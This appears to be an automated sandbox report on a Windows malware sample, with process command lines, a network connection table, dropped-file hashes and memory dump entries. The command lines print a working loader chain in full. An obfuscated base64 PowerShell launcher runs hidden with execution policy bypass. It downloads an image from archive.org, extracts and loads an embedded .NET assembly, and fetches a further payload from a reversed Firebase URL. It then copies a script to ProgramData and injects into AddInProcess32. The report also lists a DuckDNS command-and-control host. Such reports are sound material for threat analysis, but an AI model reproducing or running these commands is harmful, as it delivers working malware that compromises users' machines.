▷Lg㏵ ⊷ ➟ ⇒ ▷x㏵ ⊷ ➟ ⇒ ▷D㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷N㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷y㏵ ⊷ ➟ ⇒ ▷D㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷Mg㏵ ⊷ ➟ ⇒ ▷4㏵ ⊷ ➟ ⇒ ▷D㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷Ng㏵ ⊷ ➟ ⇒ ▷w㏵ ⊷ ➟ ⇒ ▷G0㏵ ⊷ ➟ ⇒ ▷cgBv㏵ ⊷ ➟ ⇒ ▷Hc㏵ ⊷ ➟ ⇒ ▷e㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷bwBs㏵ ⊷ ➟ ⇒ ▷C8㏵ ⊷ ➟ ⇒ ▷bw㏵ ⊷ ➟ ⇒ ▷v㏵ ⊷ ➟ ⇒ ▷G0㏵ ⊷ ➟ ⇒ ▷bwBj㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bv㏵ ⊷ ➟ ⇒ ▷H㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷cwBw㏵ ⊷ ➟ ⇒ ▷H㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷YQ㏵ ⊷ ➟ ⇒ ▷u㏵ ⊷ ➟ ⇒ ▷DQ㏵ ⊷ ➟ ⇒ ▷Mg㏵ ⊷ ➟ ⇒ ▷w㏵ ⊷ ➟ ⇒ ▷DI㏵ ⊷ ➟ ⇒ ▷cwB0㏵ ⊷ ➟ ⇒ ▷H㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷eQBy㏵ ⊷ ➟ ⇒ ▷GM㏵ ⊷ ➟ ⇒ ▷LwBi㏵ ⊷ ➟ ⇒ ▷C8㏵ ⊷ ➟ ⇒ ▷M㏵ ⊷ ➟ ⇒ ▷B2㏵ ⊷ ➟ ⇒ ▷C8㏵ ⊷ ➟ ⇒ ▷bQBv㏵ ⊷ ➟ ⇒ ▷GM㏵ ⊷ ➟ ⇒ ▷LgBz㏵ ⊷ ➟ ⇒ ▷Gk㏵ ⊷ ➟ ⇒ ▷c㏵ ⊷ ➟ ⇒ ▷Bh㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷b㏵ ⊷ ➟ ⇒ ▷Bn㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷bwBn㏵ ⊷ ➟ ⇒ ▷C4㏵ ⊷ ➟ ⇒ ▷ZQBn㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷cgBv㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷cwBl㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷YQBi㏵ ⊷ ➟ ⇒ ▷GU㏵ ⊷ ➟ ⇒ ▷cgBp㏵ ⊷ ➟ ⇒ ▷GY㏵ ⊷ ➟ ⇒ ▷Lw㏵ ⊷ ➟ ⇒ ▷v㏵ ⊷ ➟ ⇒ ▷Do㏵ ⊷ ➟ ⇒ ▷cwBw㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷d㏵ ⊷ ➟ ⇒ ▷Bo㏵ ⊷ ➟ ⇒ ▷Cc㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷s㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷Jw㏵ ⊷ ➟ ⇒ ▷x㏵ ⊷ ➟ ⇒ ▷Cc㏵ ⊷ ➟ ⇒ ▷I㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷s㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷JwBD㏵ ⊷ ➟ ⇒ ▷Do㏵ ⊷ ➟ ⇒ ▷X㏵ ⊷ ➟ ⇒ ▷BQ㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷bwBn㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷YQBt㏵ ⊷ ➟ ⇒ ▷EQ㏵ ⊷ ➟ ⇒ ▷YQB0㏵ ⊷ ➟ ⇒ ▷GE㏵ ⊷ ➟ ⇒ ▷X㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷n㏵ ⊷ ➟ ⇒ ▷C㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷L㏵ ⊷ ➟ ⇒ ▷㏵ ⊷ ➟ ⇒ ▷g㏵ ⊷ ➟ ⇒ ▷Cc㏵ ⊷ ➟ ⇒ ▷ZQBz㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷YQB1㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷YQBu㏵ ⊷ ➟ ⇒ ▷HQ㏵ ⊷ ➟ ⇒ ▷a㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷HI㏵ ⊷ ➟ ⇒ ▷YQ㏵ ⊷ ➟ ⇒ ▷n㏵ ⊷ ➟ ⇒ ▷Cw㏵ ⊷ ➟ ⇒ ▷JwBB㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷BJ㏵ ⊷ ➟ ⇒ ▷G4㏵ ⊷ ➟ ⇒ ▷U㏵ ⊷ ➟ ⇒ ▷By㏵ ⊷ ➟ ⇒ ▷G8㏵ ⊷ ➟ ⇒ ▷YwBl㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷cw㏵ ⊷ ➟ ⇒ ▷z㏵ ⊷ ➟ ⇒ ▷DI㏵ ⊷ ➟ ⇒ ▷Jw㏵ ⊷ ➟ ⇒ ▷s㏵ ⊷ ➟ ⇒ ▷Cc㏵ ⊷ ➟ ⇒ ▷Z㏵ ⊷ ➟ ⇒ ▷Bl㏵ ⊷ ➟ ⇒ ▷HM㏵ ⊷ ➟ ⇒ ▷YQB0㏵ ⊷ ➟ ⇒ ▷Gk㏵ ⊷ ➟ ⇒ ▷dgBh㏵ ⊷ ➟ ⇒ ▷GQ㏵ ⊷ ➟ ⇒ ▷bw㏵ ⊷ ➟ ⇒ ▷n㏵ ⊷ ➟ ⇒ ▷Ck㏵ ⊷ ➟ ⇒ ▷KQ㏵ ⊷ ➟ ⇒ ▷=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('㏵ ⊷ ➟ ⇒ ▷','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('34e7beafd5a3-837a-f3b4-2ee1-afdf4ecf=nekot&aidem=tla?txt.1042028060mrowxenol/o/moc.topsppa.4202stpyrc/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , '1' , 'C:\ProgramData\' , 'estauranthera','AddInProcess32','desativado'))"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\estauranthera.js"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.56.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ia601606.us.archive.org | udp |
| US | 207.241.227.86:443 | ia601606.us.archive.org | tcp |
| US | 8.8.8.8:53 | 86.227.241.207.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | firebasestorage.googleapis.com | udp |
| NL | 142.251.36.10:443 | firebasestorage.googleapis.com | tcp |
| US | 8.8.8.8:53 | 10.36.251.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| FR | 163.172.52.83:7000 | lisa22194141.duckdns.org | tcp |
| US | 8.8.8.8:53 | 83.52.172.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | udp |
Files
memory/4216-0-0x00007FF9015F3000-0x00007FF9015F5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jv20geut.4bw.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4216-10-0x000001D2B8D70000-0x000001D2B8D92000-memory.dmp
memory/4216-11-0x00007FF9015F0000-0x00007FF9020B1000-memory.dmp
memory/4216-12-0x00007FF9015F0000-0x00007FF9020B1000-memory.dmp
memory/3968-22-0x000001E1D2750000-0x000001E1D2872000-memory.dmp
memory/1360-24-0x0000000000400000-0x0000000000410000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | feadc4e1a70c13480ef147aca0c47bc0 |
| SHA1 | d7a5084c93842a290b24dacec0cd3904c2266819 |
| SHA256 | 5b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac |
| SHA512 | c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f41839a3fe2888c8b3050197bc9a0a05 |
| SHA1 | 0798941aaf7a53a11ea9ed589752890aee069729 |
| SHA256 | 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a |
| SHA512 | 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699 |
memory/4216-30-0x00007FF9015F0000-0x00007FF9020B1000-memory.dmp
memory/1360-31-0x00000000051B0000-0x000000000524C000-memory.dmp
memory/1360-32-0x0000000005C40000-0x00000000061E4000-memory.dmp
memory/1360-33-0x0000000006290000-0x0000000006322000-memory.dmp
memory/1360-34-0x0000000006270000-0x000000000627A000-memory.dmp
memory/1360-35-0x00000000070D0000-0x0000000007136000-memory.dmp
memory/1360-36-0x0000000007AF0000-0x0000000007C0E000-memory.dmp
memory/1360-37-0x0000000007C50000-0x0000000007FA4000-memory.dmp
memory/1360-38-0x0000000008140000-0x000000000818C000-memory.dmp
memory/1360-77-0x0000000008390000-0x00000000083B2000-memory.dmp